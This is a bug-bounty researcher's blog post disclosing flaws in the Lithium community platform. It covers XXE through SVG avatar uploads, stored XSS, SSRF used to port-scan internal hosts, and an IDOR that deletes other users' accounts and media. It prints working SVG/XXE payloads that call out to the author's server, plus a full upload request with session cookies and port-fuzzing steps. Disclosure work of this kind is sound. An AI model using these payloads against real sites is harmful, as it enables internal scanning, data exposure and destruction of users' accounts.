Blog

Journey With Lithium Bugs

This is a Journey which started at 2016 when I first found the Vulnerability in one of the Bugcrowd Program’s Community sites. That time I was not realized that these Vulnerabilities which I found on bugcrowd Program would going to applicable to many sites like ATT, Paypal, Ubnt, SqquareUp, SONY, Spotify and many, and would help me in enumerating total of 8000$ from various companies and sites. The journey is Still ON. In 2016-17 I found 5 Vulnerabilities in one of the Bugcrowd Program. Those are

Vulnerability 1) XXE after uploading SVG file,

Vulnerability 2) Delete Any User Account permanently

Vulnerability 3) Change and Delete anyone’s profile Image

Vulnerability 4) Delete Videos of other users

Vulnerability 5) Lithium-Forum-Server-Side-Request-Forgery

Later soon I realized that it is in Lithium Community Platform. I reported to Lithium, for two months no replies .Usually Lithum has a bad way to mitigate its vulnerability in their product and also no proper response to researcher who provides vulnerability disclosure to them.Also they donot care whether the vulnerability is critical ,they used to fix there vulnerability quarterly not immediately.Later I Asked to CIRT to provide CVE-ID but they told that for SAAS product they do not provide CVE-ID. At last I decided to report it to all of the Lithium Clients who have Bug bounty. I have found that around 400+ organisation uses Lithium product but very few around 10 has bug bounty program. I reported to all the above 5 Vulnerability to 10 Organisation like ATT, Spotify, Ubnt, Paypal and some private program. I came up with the Collection of 8000$ for those bugs not from Lithium but from Lithium clients.

Now we are in 2019 and I again found one Critical Vulnerability and soon will come up with write-up and disclosure.


About Lithium proprietary community platforms Product:–

Lithium technologies have SAAS business for Lithium’s proprietary community platforms .Go to  http://www.lithium.com/   for more information of using this product.

https://en.wikipedia.org/wiki/Lithium_Technologies

Vilnerability 1: XXE in community.{site}.com

There is an functionality in lithium community platform community.{site}.com  to upload avatars and image .This allows to upload svg file .During uploading SVG file (embedded with XML code) to the server the server XML parser started parsing XML in server side . These causes XXE which can produce severe and dangerous effect. The XXE attack allows an attacker to scan internal port,remote server port, upload dtd file ,FTP DOS attack and many. Below are the few which I am able to prove

1)Proved causing OOB XXE to my server vps0007.dasaweb.co.uk

2)Proved causing SSRF and port SCAN

3)Proved causing FTP DOS as FTP connection happening to my server vps0007.dasaweb.co.uk

4)information disclosure (sensitive)

STEP BY STEP POC:–

1)Logged in Community.{site}.com

Go to either https://community.{site}.com/t5/media/gallerypage/user-id/61xxxx or https://community.{site}.com/t5/user/myprofilepage/tab/user-icons

Image Upload option is https://community.{site}.com/t5/media/gallerypage/user-id/61xxxx

Avatar Upload Option is https://community.{site}.com/t5/user/myprofilepage/tab/user-icons

2)I tried to upload SVG file whose source code is below.After Uploading SVG file I can access it from Public with XSS executed.

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,320 240,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      prompt('paswword please!');
   </script>
</svg>

Now after executing XSS using SVG file the second thought came to my mind to execute XXE. In svg file I embeded below XXE payload and I found the request is going to my server.


3)Upload it either going through Browse option of add image or avatar upload

4) I saw the request in my server where netcat is enable from ams1-nat.lithium.com

5)Now change the code of xml in svg file by putting FTP

<?xml version=”1.0″ ?><!DOCTYPE r [ <!ELEMENT r ANY >

<!ENTITY sp SYSTEM “FTP://vps0007.dasaweb.co.uk:9001/data.xml”>

]>

<r>&sp;</r>

6)Upload it and check the request in my server where netcat is enable from ams1-nat.lithium.com

listening on [37.59.68.106] 9001 …

connect to [37.59.68.106] from ams1-nat.lithium.com [46.19.168.9] 55535

As FTP is enable which will cause FTP DOS

6)Now Intercept the request of upload of svg file in BURP and send to intruder

REQUEST WILL BE LIKE THIS

POST /t5/user/myprofilepage.imageuploadeditor:uploadimage?t:ac=tab/user-icons&t:cp=block/propertyeditblocks HTTP/1.1

Host: community.{site}.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

X-Requested-With: XMLHttpRequest

Referer: https://community.{site}.com/t5/user/myprofilepage/tab/user-icons

Content-Length: 988

Content-Type: multipart/form-data; boundary=—————————39612053628921

Cookie: optimizelyEndUserId=oeu1481831612267r0.5301134228318806; optimizelySegments=%7B%226174980032%22%3A%22referral%22%2C%226176630028%22%3A%22none%22%2C%226179250069%22%3A%22false%22%2C%226161020302%22%3A%22ff%22%7D; optimizelyBuckets=%7B%7D; _ga=GA1.2.856307035.1481831613; LithiumVisitor=~2mlCxJIBDYkI66Wpk~jJhAOVlH9wU3MOi6b0s0_wN3sAvU6am8nS91Ee6z_AFTDxdU4dO7YEIoybEGfdOptsQ6Y_Y8yH4Wt5qwPH-LtQ..; VISITOR_BEACON=~24arMJQ7k9e6Vls0T~1nsUYDVR1GQM3jnxF1qUNHxWE3Ck1CUe_1KwZuhtwQkwlvJoDYp5vshAyMWRzq1ZS26NHKJ9D0gKBoJcK0e2uA..; spot=%7B%22t%22%3A1483096080%2C%22m%22%3A%22us%22%2C%22p%22%3A%22open%22%2C%22w%22%3A%22%22%7D; sp_t=eabead6d001e35c9554cad2abe1f0e90; __tdev=GY64fzC6; fbm_174829003346=base_domain=.{site}.com; plp=e6e94d678d6ebc404cf77d5b7869462cb0a22231; __sonar=18159967670673728347; __gads=ID=42c92ad7292daba4:T=1483096014:S=ALNI_MaaH3lqaYxvUa3TM7DPX46Zz2Qa-w; sp_fi=1; sp_cc=1; sp_last_utm=%7B%22utm_source%22%3A%22{site}_webplayer%22%2C%22utm_medium%22%3A%22growth_conversion%22%2C%22utm_campaign%22%3A%22trial_accountoverview_all%22%2C%22utm_content%22%3A%22all500003%22%7D; __tumi=b7de3a83508bbe9f6412; {site}_market=uk; LiSESSIONID=09254C4F2C5AA57054F5336916B6103C; sp_dc=AQBo0ZT90RSICQpQvQpAJRz3FCjF9kIb6M0cTqxHkI8NdwCL_AsTUoUTQfatyjCizKmAP7cn2StzDcKwexD4jdG1; lithiumLogin:{site}=~2Y1sAQZ4B8FxaQTm4~rjKz7S1r1pjF_kMrSEjjEvkPNRocgqiBxhzDlT4oJHobkcK7egvELv9KoHpfSH-k; LithiumUserInfo=6161419; LithiumUserSecure=55ad1238-fb6a-4ab6-9ada-b23e8298a837; _gat=1

Connection: close

—————————–39612053628921

Content-Disposition: form-data; name=”anonAction”

true

—————————–39612053628921

Content-Disposition: form-data; name=”t:ac”

tab/user-icons

—————————–39612053628921

Content-Disposition: form-data; name=”t:cp”

block/propertyeditblocks

—————————–39612053628921

Content-Disposition: form-data; name=”Filename”

xxe_svg.svg

—————————–39612053628921

Content-Disposition: form-data; name=”Filesize”

251

—————————–39612053628921

Content-Disposition: form-data; name=”Filedata”; filename=”xxe_svg.svg”

Content-Type: image/svg+xml

<?xml version=”1.0″ standalone=”yes”?><!DOCTYPE ernw [ <!ENTITY xxe SYSTEM “FTP:// vps0007.dasaweb.co.uk:§9001§” > ]><svg width=”500px” height=”40px” xmlns=”http://www.w3.org/2000/svg” xmlns:xlink=”http://www.w3.org/1999/xlink” version=”1.1″>&xxe;</svg>

—————————–39612053628921—

7)Now FUZZ the PORT as here it is 9001 FTP:// vps0007.dasaweb.co.uk:§9001§”

Fuzz it from 20 to 90 in intruder and remember to put number of thread in intruder as 1.I have port 80 and 22,23 open.

You can see below port 22,23 and 80 has timeout which means it is open.

Now for internal LocalHost put 127.0.0.1:{port}.The moment you will put 127.0.0.1:{port} it will start scanning its own system disclosing the Open Port in its hosted system.


Vulnerability 2:IDOR to Delete Any Users Community Account ,any video ,any image

There is a functionality in which you can delete any lithium account.You can close your account .After you close your account, you can’t re-open it. When your account is closed, all kudos, accepted solutions,Posts,Friends and achievements will be permanently deleted. If you later decide to re-join the community, you must re-register and start from scratch. Closing your account will immediately log you out.

Now in this IDOR When User id is changed with Victim user ID then Victims account got delete after processing the Requests.This happens Because Application is not validating user Id with the Current Session Account holder.Due to that when User id got change with victim id ,victims account gets deleted.

Similarly for deleting users video and images application is using User ID and same logic is used to delete videos and images of other users.

Rewards and recognition:–

CompanySitesAward &Recog
spotifycommunity sites4000$
ING BankMany sites600$
PaypalCommunity sites500$
Ubiquity NetworkCommunity1500$
AT&TSites1500$